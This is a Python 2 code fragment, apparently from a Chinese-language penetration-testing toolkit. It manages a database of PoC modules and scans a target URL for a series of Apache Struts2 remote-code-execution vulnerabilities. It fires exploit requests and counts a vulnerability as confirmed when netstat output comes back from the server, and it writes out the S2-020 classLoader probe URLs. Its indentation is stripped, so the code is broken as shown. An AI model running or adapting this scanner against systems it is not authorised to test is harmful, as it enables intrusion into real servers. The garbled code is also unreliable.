def print_poc_name_info(self, PL_POC_NAME):
cursor = self.sql_exec.select()
desc = '''
DirFileName
-----------
'''
if PL_POC_NAME:
print desc
print " {FileName:<55}{Name:<25}{Date:<20}".format(
FileName="FileName",
Name="Name",
Date="Date",
)
print " {FileName:<55}{Name:<25}{Date:<20}".format(
FileName="--------",
Name="----",
Date="----",
)
print
try:
for row in cursor:
poc_name = row[0]
poc_name_path = row[1]
date = row[2]
file_name = os.path.split(poc_name_path)[1] #分割出目录与文件
#file_name = file_name[1] #取出文件名
if PL_POC_NAME in file_name:
file_date = date
pname = pl_del_suffix(poc_name) #模块文件路径
pocname = pl_del_suffix(file_name) #
print " {FileName:<55}{Name:<25}{Date:<20}".format(
FileName=pname, Name=pocname, Date=date)
else:
pass
except:
self.sql_exec.db_close()
return
else:
print setcolor.set_red("[-] ") + "Sorry! Not Found Module."
self.sql_exec.db_close()
self.sql_exec.db_close()
def check(self, pocname, vulnstr):
if vulnstr.find("Active Internet connections") is not -1:
print setcolor.set_red("[*] 目标存在" + pocname + "漏洞..[Linux]")
elif vulnstr.find("Active Connections") is not -1:
print setcolor.set_red("[*] 目标存在" + pocname + "漏洞..[Windows]")
elif vulnstr.find("活动连接") is not -1:
print setcolor.set_red("[*] 目标存在" + pocname + "漏洞..[Windows]")
elif vulnstr.find("LISTEN") is not -1:
print setcolor.set_red("[*] 目标存在" + pocname + "漏洞..[未知OS]")
else:
print setcolor.set_green("[*] 目标不存在" + pocname + "漏洞..")
def insert_poc_name(self):
#date = self.times.get_date() #获取日期
sql = "UPDATE STATUS set FLAG = 'True' WHERE ID = 1"
try:
for root, dirs, files in os.walk(self.PWD):
for name in files:
if name[-3:] == '.py' and name != '__init__.py':
file_name = root.replace(self.PWD, "") + "/" + name
file_path = root + "/" + name
self.sql_exec.insert(file_name, file_path,
self.date) #插入数据
#print file_name
#print file_path
else:
pass
except:
print setcolor.set_red("[!] ") + "加载PAYLOAD失败,请重新运行!"
self.sql_exec.db_close()
self.sql_exec.update(sql)
self.sql_exec.db_close()
def exist_poc(self):
#date = self.times.get_date() #获取日期
#首先遍历整个目录,看是否有存在新增文件
cursor = self.sql_exec.select() #读取所有模块文件
try:
for root, dirs, files in os.walk(self.PWD):
for name in files:
if name[-3:] == '.py' and name != '__init__.py':
file_name = root.replace(self.PWD, "") + "/" + name
file_path = root + "/" + name
#判断是否存在
poc_flag = self.cmp_module(cursor, file_name,
file_path)
if poc_flag == True:
self.sql_exec.insert(file_name, file_path,
self.date) #插入数据
else:
pass
except:
print setcolor.set_red("[!] ") + "加载PAYLOAD失败,请重新运行!"
self.sql_exec.db_close()
self.sql_exec.db_close()
def scan(self):
print setcolor.set_cyan("====-------检测struts2漏洞--------====\n目标url:" +
self.url)
try:
req = requests.post(self.url,
headers=headers,
data=self.poc['ST2-005'],
timeout=6,
verify=False)
self.check("struts2-005", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-005超时..")
try:
req = requests.post(self.url,
headers=headers,
data=self.poc['ST2-009'],
timeout=6,
verify=False)
self.check("struts2-009", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-009超时..")
try:
req = requests.post(self.url,
headers=headers,
data=self.poc['ST2-013'],
timeout=6,
verify=False)
self.check("struts2-013", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-013超时..")
try:
req = requests.post(self.url,
headers=headers,
data=self.poc['ST2-016'],
timeout=6,
verify=False)
self.check("struts2-016", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-016超时..")
try:
req = requests.post(self.url,
headers=headers,
data=self.poc['ST2-019'],
timeout=6,
verify=False)
self.check("struts2-019", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-019超时..")
try:
req = requests.get(self.url + self.poc['ST2-devmode'],
headers=headers,
timeout=6,
verify=False)
self.check("struts2-devmode", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-devmode超时..")
try:
req = requests.get(self.url + self.poc['ST2-032'],
headers=headers,
timeout=6,
verify=False)
self.check("struts2-032", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-032超时..")
try:
req = requests.get(self.url + self.poc['ST2-033'],
headers=headers,
timeout=6,
verify=False)
self.check("struts2-033", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-033超时..")
try:
req = requests.get(self.url + self.poc['ST2-037'],
headers=headers,
timeout=6,
verify=False)
self.check("struts2-037", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-037超时..")
try:
req = requests.get(self.url,
headers=headers2,
timeout=6,
verify=False)
self.check("struts2-045", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-045超时..")
try:
req = requests.post(self.url,
data="",
headers=headers3,
timeout=6,
verify=False)
self.check("struts2-048", req.text)
except:
print setcolor.set_cyan("[-] 检测struts2-048超时..")
try:
req1 = requests.get(self.url +
"?class[%27classLoader%27][%27jarPath%27]=1",
headers=headers,
timeout=6,
verify=False)
req2 = requests.get(self.url +
"?class[%27classLoader%27][%27resources%27]=1",
headers=headers,
timeout=6,
verify=False)
if req1.status_code == 200 and req2.status_code == 404:
print setcolor.set_red("[*] 目标存在struts2-020漏洞..(只提供检测)")
else:
print setcolor.set_green("[+] 目标不存在struts2-020漏洞..")
except:
print setcolor.set_cyan("[-] 检测struts2-020超时..")